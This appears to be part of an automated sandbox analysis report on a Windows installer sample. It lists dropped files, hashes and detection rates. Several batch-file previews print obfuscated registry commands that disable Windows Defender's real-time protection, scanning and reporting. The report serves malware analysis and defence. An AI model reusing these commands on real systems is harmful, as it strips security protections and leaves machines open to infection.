                                MD5:B873B53A111AD0BC879BB2A9F13F6E42
                                SHA1:6FEC8422AA8B713198D208E6EF368AD315A0E875
                                SHA-256:CA6FFE62A8B50B04365897DD86FC99B510BB56B1C2B227A162675915C4027ABC
                                SHA-512:57CFEC0C2ED7F7E311BD5D284E1744767B7C4C72A8F5E077A5039BE22377894889AD476C8C8A706E15590A613A83C7986476CE18014F16A6B9C88284A146B7FD
                                Malicious:false
                                Preview:@echo off & title f & color 17..cd %~dp0..set lofddfcaftiofgdfn=Windows Defender.... reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%" /v "PUAProtection" /t reg_DWORD /d "0" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f..
                                Process:C:\Users\user\Desktop\KYagm8gq5S.exe
                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):248
                                Entropy (8bit):4.8560729637056195
                                Encrypted:false
                                SSDEEP:6:hnIbwjsH1gCTBSiA71Y5JV4yTPm/O8zzCGQLFDFHVol:VwXZ9am8zDQphC
                                MD5:5EB0F1FC0625E457CFF176DBE24C80A8
                                SHA1:176B93EF2263A41780C2A0B5F103FB2BB8ADB258
                                SHA-256:0F8FC2848315C45384F4A882F66C00B6136A825220FF69F97BC722CE9DE796D0
                                SHA-512:FA687C99E67E5EBD0A5EEF7D38A95E098C9B5B6A4274CDC5437D579F8D8D6A365803F044510F57D701FF30ADF26B11C6E97A5A7293E719ECE260A22C778CEDA2
                                Malicious:false
                                Preview:@echo off & title f & color 17..cd %~dp0..set lofddfcaftiofgdfn=Windows Defender..set lofineddfcaftiofgdfn=MpEngine.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%\%lofineddfcaftiofgdfn%" /v "MpEnablePus" /t reg_DWORD /d "0" /f..
                                Process:C:\Users\user\Desktop\KYagm8gq5S.exe
                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):779
                                Entropy (8bit):5.033788172625281
                                Encrypted:false
                                SSDEEP:24:yxdUJJMKH5adUJJlVKH5adVMadRMadTFL:+nW5wIW5wVMwRMwTFL
                                MD5:502141F08CF3A1A3A6B86664D5B3016B
                                SHA1:DD02560635C812FBF8712AAE19186F6CEA46755C
                                SHA-256:3FEE5FAEA4C993E24DD146C38AE26E4CF84718799699BEF0561DCF35D9442503
                                SHA-512:0198ABA11D8C13672DC7CA38B971A563822CD2D6958248784B7C2112D91035276A614C1ADBA47993B292ADDE96A29C48B2ED6D5FEE583935C33E9A7D3B0A1863
                                Malicious:false
                                Preview:@echo off & title f & color 17..cd %~dp0..set lofddfcaftiofgdfn=Windows Defender..reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f..
                                Process:C:\Users\user\Desktop\KYagm8gq5S.exe
                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1156
                                Entropy (8bit):5.018890749779181
                                Encrypted:false
                                SSDEEP:24:yxdUJJMKH5adOMadmMaddMadzTMad0lNxad01UJadFOy:+nW5wOMwmMwdMwXMw0Txw0mJwIy
                                MD5:6C2F2CECCABD30E915BDA62099D9BD60
                                SHA1:8CF0635E3C7FC92A3EA446FB334DFD8C8A3D51E5
                                SHA-256:840309DF7FF7FE80446D42CBF49D5CD8850017FAD04767225357BA5517E664D8
                                SHA-512:20DC6A15A6A575153462D97C5BE5DCF7F7B40850C7B30AFBF26B5E7050FCA2487EC8273ED5CE732C28E140E93437B2E078DFC50C53A44289454165A9A6978A60
                                Malicious:false
                                Preview:@echo off & title f & color 17..cd %~dp0..set lofddfcaftiofgdfn=Windows Defender..reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%\Remediation" /v "Scan_Schedule
                                Process:C:\Users\user\Desktop\KYagm8gq5S.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):6659
                                Entropy (8bit):5.257330446656906
                                Encrypted:false
                                SSDEEP:192:+NU51xvjKi66SBMUKQJ/mRof4aGeB4Cqp0G4f:Yn
                                MD5:B2CEFC347ED58D497AC1D124BFE73E89
                                SHA1:7828251E46246618894AA5937E8093EB160ACF2B
                                SHA-256:3B238C78C325ADB1F5BC129151CED81B16B4F9557E8ADEB5E6067A2A09192868
                                SHA-512:EBBBCFB3B5CD6F227240E892718C255263C674A1CAFBA6BE454D16EC24015BF018BD2FBEC89E97B42BE448957849F8A5BC2D821DEF123A512AD31B8F744A3582
                                Malicious:false
                                Preview: @echo off & title f & color 17.. cd %~dp0..set location=Windows Defender.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%location%\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%location%\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%location%\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%location%\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%location%\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%location%\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%location%\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%location%\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /
                                Process:C:\Users\user\Desktop\KYagm8gq5S.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):15360
                                Entropy (8bit):4.989618164583392
                                Encrypted:false
                                SSDEEP:384:8lqTZjX7pr3Fi0h1MFiINg3/nonmGfB2MuK:8lqc56Qmm
                                MD5:2924ECDB306FFD3C3C226F4F2B0F9A7E
                                SHA1:FC17904D30B924D8337C65C42E8F69F1FBC80843
                                SHA-256:6EB6224DFE5AF519B3B78D76BE107D68A93C012999D790AE733BED6020891AEE
                                SHA-512:DDF804359F0F0A1E62DCC69E5942BC0F9E3DB3434D1A7A6AD4292BC3DE8A455E6989A1DCD82BBA2225BDA4F5BE0D788C05B04C08CBD50F69217FEE747292D68D
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}?eg.........."...0..2..........JQ... ...`....@.. ....................................`..................................P..O....`...............................O............................................... ............... ..H............text...P1... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............:..............@..B................,Q......H........5..............PN..p.............................................~....}.....~....}.....~....}.....(.....(....*..0..C........{....r...po......{....r...p(....}.....{....%o.....{....(....o....*..0..C........{....r...po......{....r...p(....}.....{....%o.....{....(....o....*..0..C........{....r...po......{....r...p(....}.....{....%o.....{....(....o....*..0..C........{....r...po......{....r...p(....}.....{....%o.....{....(....o....*..0..C........{....r...po......{....r...p
                                Process:C:\Users\user\Desktop\KYagm8gq5S.exe
                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):945944
                                Entropy (8bit):6.654096172451499
                                Encrypted:false
                                SSDEEP:24576:X2DW/xbMX2YIbxQsu3/PNLoQ+HyS2I4jRk:X2EgXoQsW/PNUQWnX4jRk
                                MD5:EFE5769E37BA37CF4607CB9918639932
                                SHA1:F24CA204AF2237A714E8B41D54043DA7BBE5393B
                                SHA-256:5F9DFD9557CF3CA96A4C7F190FC598C10F8871B1313112C9AEA45DC8443017A2
                                SHA-512:33794A567C3E16582DA3C2AC8253B3E61DF19C255985277C5A63A84A673AC64899E34E3B1EBB79E027F13D66A0B8800884CDD4D646C7A0ABE7967B6316639CF1
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 21%
                                Joe Sandbox View:
                                • Filename: Auu2j0pT0B.exe, Detection: malicious, Browse
                                • Filename: 4hIPvzV6a2.exe, Detection: malicious, Browse
                                • Filename: 3Dut8dFCwD.exe, Detection: malicious, Browse
                                • Filename: Ms63nDrOBa.exe, Detection: malicious, Browse
                                • Filename: Ptmhbplhxb.exe, Detection: malicious, Browse
                                • Filename: P196hUN2fw.exe, Detection: malicious, Browse
                                • Filename: e4.exe, Detection: malicious, Browse
                                • Filename: 2dOeahdsto.exe, Detection: malicious, Browse
                                • Filename: bQQHP9ciRL.exe, Detection: malicious, Browse
                                • Filename: DllHost.exe, Detection: malicious, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.@............yGI......p\.}....pJ......p[.............._.....................pP......ZJ......ZK.......H......pN.....Rich............................PE..d...(..K..........#......\...*......|..........@.....................................N........@...............@.................................T................j...Q.. ............................................................p...............................text....Z.......\.................. ..`.rdata...V...p...X...`..............@..@.data............v..................@....pdata...j.......l..................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\KYagm8gq5S.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                Category:dropped
                                Size (bytes):5120
                                Entropy (8bit):5.021119508727912
                                Encrypted:false
                                SSDEEP:96:NdekHUj5z13cPopei+Ml9PNDFbS7xg+TScrQ5:NdeuU9xcPopr+M9FbSS+TSE
                                MD5:E5786E8703D651BC8BD4BFECF46D3844
                                SHA1:FEE5AA4B325DEECBF69CCB6EADD89BD5AE59723F
                                SHA-256:D115BCE0A787B4F895E700EFE943695C8F1087782807D91D831F6015B0F98774
                                SHA-512:D14AD43A01DB19428CD8CCD2FE101750860933409B5BE2EB85A3E400EFCD37B1B6425CE84E87A7FE46ECABC7B91C4B450259E624C178B86E194BA7DA97957BA3
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................t........................................Rich....................PE..L...rb.R...........!.............`..@v...p................................................@.........................`...D...X...........X...........................................................................................................UPX0.....`..............................UPX1.........p......................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....
                                Process:C:\Users\user\Desktop\KYagm8gq5S.exe
                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):616312
                                Entropy (8bit):6.302197712270286
                                Encrypted:false
                                SSDEEP:12288:3G2NBTh+l8gAqAbdsuEa3nZGSebY7o937bfJ9Ud:3xNBTYlaLdaynZGBc7orbJ9Ud
                                MD5:1FB64FF73938F4A04E97E5E7BF3D618C
                                SHA1:AA0F7DB484D0C580533DEC0E9964A59588C3632B
                                SHA-256:4EFC87B7E585FCBE4EAED656D3DBADAEC88BECA7F92CA7F0089583B428A6B221
                                SHA-512:DA6007847FFE724BD0B0ABE000B0DD5596E2146F4C52C8FE541A2BF5F5F2F5893DCCD53EF315206F46A9285DDBD766010B226873038CCAC7981192D8C9937ECE
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................}.........@..........................................................g...........Rich....................PE..d.....`..........".................x$.........@..........................................`.............................................................x.... ..P@...J..x...............p.......................(.......8...............8............................text............................... ..`.rdata... ......."..................@..@.data....8..........................@....pdata..P@... ...B..................@..@_RDATA.......p.......$..............@..@.rsrc...x............&..............@..@.reloc...............<..............@..B................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\KYagm8gq5S.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):10240
                                Entropy (8bit):5.222288638134981
                                Encrypted:false
                                SSDEEP:192:o+eyiPRetnkY5phamuQ3TWrU5ehzopSOOz/lgKf7We:NezReFkY5pJr3TWrU5dez/tf7W
                                MD5:419DF0C5A4CE2BB14D1B7BB55ABC0D17
                                SHA1:7FEED8574CDEA9A68FB345818F5B4414C1F18A49
                                SHA-256:7105976CCD68E838865B6A40A1B9615172BDD9B062A65BF0F24B236E7CD8844A
                                SHA-512:5E2CFDC6DD345962B537AC08817AC0426F28F51669961E50902D73015E356153D6ADCB8C1307D7974158F7DE5162C3EB74021202B5D5243F98E641B95C12E1CF
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 4%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:J..........."...0..............=... ...@....@.. ....................................`..................................=..O....@.......................`.......<..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B.................=......H........$..`...........x;..p.............................................(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*.~....*..(....*Vs....(....t.........*..(....*.*.*.0...........(.....(......(......(....,...+.....&...,...(.....#........(......{....(.....,...(......( ....(!....s"...}.....{....o#...r7..p........s$...o%...&.s&...%('...o(...%.o)...%rA..po*...%.{....o+...}............s$...(,...*.........$.. ...6.{.....o)...*..(-...,..(....-...(/...*..(/...*R
                                Process:C:\Users\user\Desktop\KYagm8gq5S.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):889416
                                Entropy (8bit):7.856409051573377
                                Encrypted:false
                                SSDEEP:24576:+tW4x8xAxCdUcyezFSjaBHFaNlsqK5/oh6iZf1LUXw/vxNI:d4x8xqCGexm8FCspg0iZf1LUXD
                                MD5:53406E9988306CBD4537677C5336ABA4
                                SHA1:06BECADB92A5FCCA2529C0B93687C2A0C6D0D610
                                SHA-256:FA1AFFF978325F8818CE3A559D67A58297D9154674DE7FD8EB03656D93104425
                                SHA-512:4F89DA81B5A3800AA16FF33CC4A42DBB17D4C698A5E2983B88C32738DECB57E3088A1DA444AD0EC0D745C3C6B6B8B9B86D3F19909142F9E51F513748C0274A99
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 3%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}...}...}...,...}......}.......}...//..}.../...}.../...}.......}...}...}...,+..}...,/..}...,...}...,...}...,...}..Rich.}..........................PE..L......J.........."..........^...................@..........................@......a8....@...... ..................@.......D........................z..h.......l....................................V..@............................................text.............................. ..`.data....7..........................@....boxld01............................@..@.rsrc...............................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\KYagm8gq5S.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):1005568
                                Entropy (8bit):7.880783246239561
                                Encrypted:false
                                SSDEEP:24576:3idS2cRQNb9dUcyezFSja7zEwA2BH6SEUVGDKX68zuQm6wwr5mAPepC:SQ2cRQh9GexmCxBxVV56CmWQax
                                MD5:9E8253F0A993E53B4809DBD74B335227
                                SHA1:F6BA6F03C65C3996A258F58324A917463B2D6FF4
                                SHA-256:E434828818F81E6E1F5955E84CAEC08662BD154A80B24A71A2EDA530D8B2F66A
                                SHA-512:404D67D59FCD767E65D86395B38D1A531465CEE5BB3C5CF3D1205975FF76D27D477FE8CC3842B8134F17B61292D8E2FFBA71134FE50A36AFD60B189B027F5AF0
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 3%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.]`r.33r.33r.33ih.3s.33U3^3q.33...3s.33...3Y.33...3`.33...3..33r.23..33...3g.33l..3s.33ih.37.33ih.3s.33ih.3s.33ih.3s.33Richr.33................PE..L..."x^O.........."..........^....................@..........................@......x.....@...... ..........................4............................>..........................................8Y..@............................................text...Z........................... ..`.data....7..........................@....boxld01............................@..@.rsrc...............................@..@.reloc..j(.......*..................@..B........................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\KYagm8gq5S.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):5632
                                Entropy (8bit):4.519702607207955
                                Encrypted:false
                                SSDEEP:48:6vorbN0GyvvgDgKg66mTmQrkY92r48mq8aNM+/IJ8NKkQIzSX6lc1tPA6Ct+uluU:/N0G+d8IhTKy1Wt4PQVzNt
                                MD5:71923BB5EDAFF27984A1A49095554A5F
                                SHA1:58C8886F2E6F6C1CAE2EF606FEA0C6708326F0AD
                                SHA-256:8678DA6C35691E8396814683E235C84887763E359CE197C4851467011BE9F647
                                SHA-512:D57CBAED7D338BF93101DA4B82F487AD22994DDFA2A312DC058A495D67E4BFF0ABC50AEB8304A7034B96381E3FC49C96DC0861701E91582AE2FB3DB59BEF4139
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 3%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...o............."...0..............+... ...@....@.. ....................................`.................................v+..O....@.......................`.......*..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H........!...............................................................0..........s.......o....o......o....&....s......o.....o....o.......,..o.....r...p.(....(.....<.rC..p.o....(....(.....$..r]..p..o....(....(.......,..o.....*.4....$..7..........MS..........Mk...................0..................s.......o....o....%o....&o....o....o.......(.....Io....%-.&r...p(.....4o....%-.&r...p(......o....%-.&r...p(.......,..o.....*.4......,:..........,O..........,d..........ky........(.
                                Process:C:\Users\user\Desktop\KYagm8gq5S.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):257
                                Entropy (8bit):4.97028593092204
                                Encrypted:false
                                SSDEEP:6:TMVBd1IffVKNC7VJdfEyFRSuAKbyXI9VWmtClMyuQIT:TMHdG3VOcrS98yX2yuxT
                                MD5:441F5C5C7933C16068A03D99BC8837C4
                                SHA1:76D1DE63216C2C1218CF47A5D768A18952A1DCB3
                                SHA-256:F1CAC503709C2ACD9AB0A7D0E48A4ABF2777D16052FEE68830260A78359EC72F
                                SHA-512:5B8FA02B827993541841A2FD07A50E5D2C5A7F5BA35E0B282ED3A453E3F919D63F1C9432D922CC364027351C57D2B78F99F5F1469C86B581CC53ACB76FDFC366
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5"/>.. </startup>.. <system.net>.. <defaultProxy useDefaultCredentials="true" />.. </system.net>..</configuration>
                                Process:C:\Users\user\Desktop\KYagm8gq5S.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):7168
                                Entropy (8bit):5.295306975422517
                                Encrypted:false
                                SSDEEP:96:JgzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuHIDQ:JDQHDb2vSuOc41ZfUNQZGdHA
                                MD5:11092C1D3FBB449A60695C44F9F3D183
                                SHA1:B89D614755F2E943DF4D510D87A7FC1A3BCF5A33
                                SHA-256:2CD3A2D4053954DB1196E2526545C36DFC138C6DE9B81F6264632F3132843C77
                                SHA-512:C182E0A1F0044B67B4B9FB66CEF9C4955629F6811D98BBFFA99225B03C43C33B1E85CACABB39F2C45EAD81CD85E98B201D5F9DA4EE0038423B1AD947270C134A
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L....C.f...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                Entropy (8bit):7.9948403300862685
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:KYagm8gq5S.exe
                                File size:2'666'282 bytes
                                MD5:59586c94ee121385d362a60382217b4e
                                SHA1:816f6785f139eabe477a15023ccc7cff17790763
                                SHA256:f27e3367788f7758120c63b9a725e7cb07998ce664b0571a56c8d0b8e05c1ec4
                                SHA512:6ca972a5a66b68529f6b601a445438b64978093707ffe66b22eb5a911b96f449e94119c8d9d4845f1235e9a104356b4c98207ed252d21309f000b785da9cd3c0
                                SSDEEP:49152:8bi9YK3c/XThdxGmLYxgxcrNbuK0+tWOchELCoZz943+YaJNFtM+5wL3AP9/:8u9YK3c/XThvtlGxU+0OsOCoR9YCr2ZY
                                TLSH:B9C5337BB481D577F13711340C6D7BF62CA1EB438FA80239B9B13C994D9B6968B27242
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..O@../O...@...c...@..+F...@..Rich.@..........................PE..L....C.f.................h....:....
                                Icon Hash:0771ccf8d84d2907
                                Entrypoint:0x40352f
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0x660843EA [Sat Mar 30 16:55:06 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                                Instruction
                                sub esp, 000003F8h
                                push ebp
                                push esi
                                push edi
                                push 00000020h
                                pop edi
                                xor ebp, ebp
                                push 00008001h
                                mov dword ptr [esp+20h], ebp
                                mov dword ptr [esp+18h], 0040A2D8h
                                mov dword ptr [esp+14h], ebp
                                call dword ptr [004080A4h]
                                mov esi, dword ptr [004080A8h]
                                lea eax, dword ptr [esp+34h]
                                push eax
                                mov dword ptr [esp+4Ch], ebp
                                mov dword ptr [esp+0000014Ch], ebp
                                mov dword ptr [esp+00000150h], ebp
                                mov dword ptr [esp+38h], 0000011Ch
                                call esi
                                test eax, eax
                                jne 00007F45E49071AAh
                                lea eax, dword ptr [esp+34h]
                                mov dword ptr [esp+34h], 00000114h
                                push eax
                                call esi
                                mov ax, word ptr [esp+48h]
                                mov ecx, dword ptr [esp+62h]
                                sub ax, 00000053h
                                add ecx, FFFFFFD0h
                                neg ax
                                sbb eax, eax
                                mov byte ptr [esp+0000014Eh], 00000004h
                                not eax
                                and eax, ecx
                                mov word ptr [esp+00000148h], ax
                                cmp dword ptr [esp+38h], 0Ah
                                jnc 00007F45E4907178h
                                and word ptr [esp+42h], 0000h
                                mov eax, dword ptr [esp+40h]
                                movzx ecx, byte ptr [esp+3Ch]
                                mov dword ptr [007A8318h], eax
                                xor eax, eax
                                mov ah, byte ptr [esp+38h]
                                movzx eax, ax
                                or eax, ecx
                                xor ecx, ecx
                                mov ch, byte ptr [esp+00000148h]
                                movzx ecx, cx
                                shl eax, 10h
                                or eax, ecx
                                movzx ecx, byte ptr [esp+0000004Eh]
                                Programming Language:
                                • [EXP] VC++ 6.0 SP5 build 8804
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x3e90000x3ec0.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x66d10x68001cb1571d2754df0a2b7df66b1b8d9089False0.6727388822115384data6.4708065613184305IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0x80000x13580x1400f0b500ff912dda10f31f36da3efc8a1eFalse0.44296875data5.102094016108248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0xa0000x39e3780x60092e7d2d711bd61815cb4cc2d30d795b1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .ndata0x3a90000x400000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x3e90000x3ec00x4000accbbdadc7780994edb470ff987ad04fFalse0.63299560546875data5.994142182983153IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_ICON0x3e92b00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.7213883677298312
                                RT_ICON0x3ea3580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688, 256 important colorsEnglishUnited States0.6751066098081023
                                RT_ICON0x3eb2000x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152, 256 important colorsEnglishUnited States0.7851985559566786
                                RT_ICON0x3ebaa80x568Device independent bitmap graphic, 16 x 32 x 8, image size 320, 256 important colorsEnglishUnited States0.6560693641618497
                                RT_ICON0x3ec0100x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.8031914893617021
                                RT_ICON0x3ec4780x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.3118279569892473
                                RT_ICON0x3ec7600x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.36824324324324326
                                RT_DIALOG0x3ec8880x100dataEnglishUnited States0.5234375
                                RT_DIALOG0x3ec9880x11cdataEnglishUnited States0.6056338028169014
                                RT_DIALOG0x3ecaa80x60dataEnglishUnited States0.7291666666666666
                                RT_GROUP_ICON0x3ecb080x68dataEnglishUnited States0.6634615384615384
                                RT_MANIFEST0x3ecb700x349XML 1.0 document, ASCII text, with very long lines (841), with no line terminatorsEnglishUnited States0.5517241379310345
                                DLLImport
                                ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
